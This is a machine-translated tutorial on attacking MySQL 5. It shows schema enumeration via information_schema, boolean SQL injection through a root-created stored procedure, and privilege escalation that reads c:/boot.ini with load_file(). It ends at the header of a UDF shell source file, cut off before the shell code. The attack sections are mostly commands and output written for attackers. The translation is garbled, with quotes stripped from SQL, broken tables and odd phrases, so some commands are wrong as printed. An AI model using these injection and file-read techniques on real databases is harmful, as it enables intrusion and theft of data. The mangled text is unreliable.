Mysql5-based injection test

Mysql5 has added many new features to support new features such as stored procedures, triggers, views, and information architecture views. It can be said that these are the inevitable development, but the emergence of new things will certainly bring new security problems, such as Mysql4 began to support union queries and subqueries. This directly leads to easier and more extensive mysql injection. What new things will mysql5 bring to your seat belt? The following describes the security features of MySQL 5:

I. password authentication

Like mysql4.1, password () of mysql5 adopts the SHA1-based 41-bit hash:

Mysql> select password (mypass );
+ ------------------------------------------- +
| Password (mypass) |
+ ------------------------------------------- +
| * 6c8989108eaf75bb670ad8ea7a7fc1176a95cef4 |
+ ------------------------------------------- +
1 row in set (0.00 sec)

The password hashes before mysql4.1 is based on 16-bit md5:

Mysql> select password (mypass );
+ -------------------- +
| PASSWORD (mypass) |
+ -------------------- +
| 6f8c114b58f2ce9e |
+ -------------------- +

When you connect to a Client of a lower version, the following error occurs: Client does not support authentication protocol. To solve this problem, mysql5 provides an old_password (), it is equivalent to the password () before mysql4.1 ():

Mysql> select old_password (mypass );
+ ------------------------ +
| Old_password (mypass) |
+ ------------------------ +
| 6f8c114b58f2ce9e |
+ ------------------------ +
1 row in set (0.09 sec)

2. Data Dictionary (information_schema)

Like databases such as mssql, oracle, and db2, mysql5 provides a system database: information_schema
Mysql> use information_schema;
Database changed
Mysql> show tables;
+ --------------------------------------- +
| Tables_in_information_schema |
+ --------------------------------------- +
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| VIEWS |
| USER_PRIVILEGES |
+ --------------------------------------- +
16 rows in set (0.17 sec)

In this database, we can get a lot of information, including the current user permissions:
Mysql> select * from information_schema.USER_PRIVILEGES;
+ ----------- + --------------- + ---------------- + -------------- +
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+ ----------- + --------------- + ---------------- + -------------- +
| KK1 @ % | NULL | USAGE | NO |
+ ----------- + --------------- + ---------------- + -------------- +
1 row in set (0.02 sec)

Databases, tables, and column names that can be accessed under the current user's permissions (this is caused by SQL injection, which leads to direct brute-force database and table column names. Do not 'brute-force 'any more ):

Mysql> select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME from information_schema.STATIS
TICS;
+ -------------- + ------------ + ------------- +
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+ -------------- + ------------ + ------------- +
| In | article | articleid |
| In | user | userid |
+ -------------- + ------------ + ------------- +
2 rows in set (0.02 sec)

You can also get VIEWS and ROUTINES under the current user's permissions. For details about ROUTINES, we will introduce them in the 'stored process' below.

[Ps: Note that if 'current user authorization' is root, you can obtain all database names and table column names.]

3. Stored Procedure)

The use of stored procedures is a shining point of mysql5. it brings convenience and new security risks, such as SQL injection and user privilege escalation.

D: mysql5in> mysql-uroot-p
Enter password :******
Welcome to the MySQL monitor. Commands end with; or g.
Your MySQL connection id is 4 to server version: 5.0.18

Type help; or h for help. Type c to clear the buffer.

Mysql> use in
Database changed
Mysql> delimiter //
Mysql> create procedure test (id INT)
-> BEGIN
-> SELECT * FROM in. user where userid = ID;
-> END //
Query OK, 0 rows affected (0.08 sec)

Mysql> delimiter;

Mysql> call test (1 );
+ -------- + ---------- +
| Userid | username | password |
+ -------- + ---------- +
| 1 | angel | mypass |
+ -------- + ---------- +
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

In the above example, we used root to create a stored procedure named test in the database in.

A. SQL Injection

Mysql> call test (1 and 1 = 1 );
+ -------- + ---------- +
| Userid | username | password |
+ -------- + ---------- +
| 1 | angel | mypass |
+ -------- + ---------- +
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

Mysql> call test (1 and 1 = 2 );
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

B. Cross-Permission
The stored procedure inherits the permissions of the creator. If the stored procedure is created by root, other common users use this stored procedure, resulting in cross-Permission attacks:

Mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
-> ON 'in '.*
-> TO KK1 @ %
-> Identified by obscure;
Query OK, 0 rows affected (0.03 sec)

The preceding KK1 user only has the SELECT, INSERT, UPDATE, DELETE, and EXECUTE permissions in the database in. Use KK1 to log on to the database:
D: mysql5in> mysql-uKK1-p
Enter password :******
Welcome to the MySQL monitor. Commands end with; or g.
Your MySQL connection id is 5 to server version: 5.0.18

Type help; or h for help. Type c to clear the buffer.

Mysql> select ROUTINE_SCHEMA, ROUTINE_NAME, DEFINER, ROUTINE_DEFINITION from inform
Ation_schema.ROUTINES;
+ ---------------- + -------------- + ---------------- + -------------------- +
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER | ROUTINE_DEFINITION |
+ ---------------- + -------------- + ---------------- + -------------------- +
| In | test | root @ localhost |
| In | tt | root @ localhost |
+ ---------------- + -------------- + ---------------- + -------------------- +
2 rows in set (0.01 sec)

We can get that KK1 can use the stored procedure in. test whose creator is root @ localhost. However, KK1 has no permission to get ROUTINE_DEFINITION, which is the code of in. test. Next let's take a look at the cross-permission:

Mysql> call in. test (1 and length (load_file (c:/boot. ini)> 0 );
+ -------- + ---------- +
| Userid | username | password |
+ -------- + ---------- +
| 1 | angel | mypass |
+ -------- + ---------- +
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

Mysql> call in. test (1 and length (load_file (c:/boot. ini) <0 );
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

KK1 without file Permission can use in. test uses load_file (), and we can directly connect to mysql. select is performed by the user. If the stored procedure can be updata or insert injection, normal users can directly modify mysql through injection. user.

Iv. User-Defined Function

[Ps: The following is based on the win system]

The udf of mysql5 has made some new changes in the format and security:
1. More strict format requirements [xxx_init () initialization function]
The initialization function without xxx_init () can be used in previous versions, but the Cant find function xxx_init in library error may occur in mysql5, for example:

Mysql> create function ExitProcess returns integer soname kernel32;
ERROR 1127 (HY000): Cant find function ExitProcess_init in library

The following code is written by friends cloud Shu. It can be used in mysql5 to meet the udf format requirements of mysql5:

/*******************************
* File: MySQL_Shell.cpp
* Author: yunshu (wustyunshu at hotmail dot com)
* Date: 2005-12-12
********************************
# Include <stdio. h>
# Include <winsock2.h>
# Include <windows. h>

# Define MAKE_DLL/* Build dll here */

# Include "MySQL_Shell.h"

# Pragma comment (lib, "ws2_32 ")

# Define BUFFER_SIZE 1024

////////////////////////////////
// Function prototype
//////////////////////////////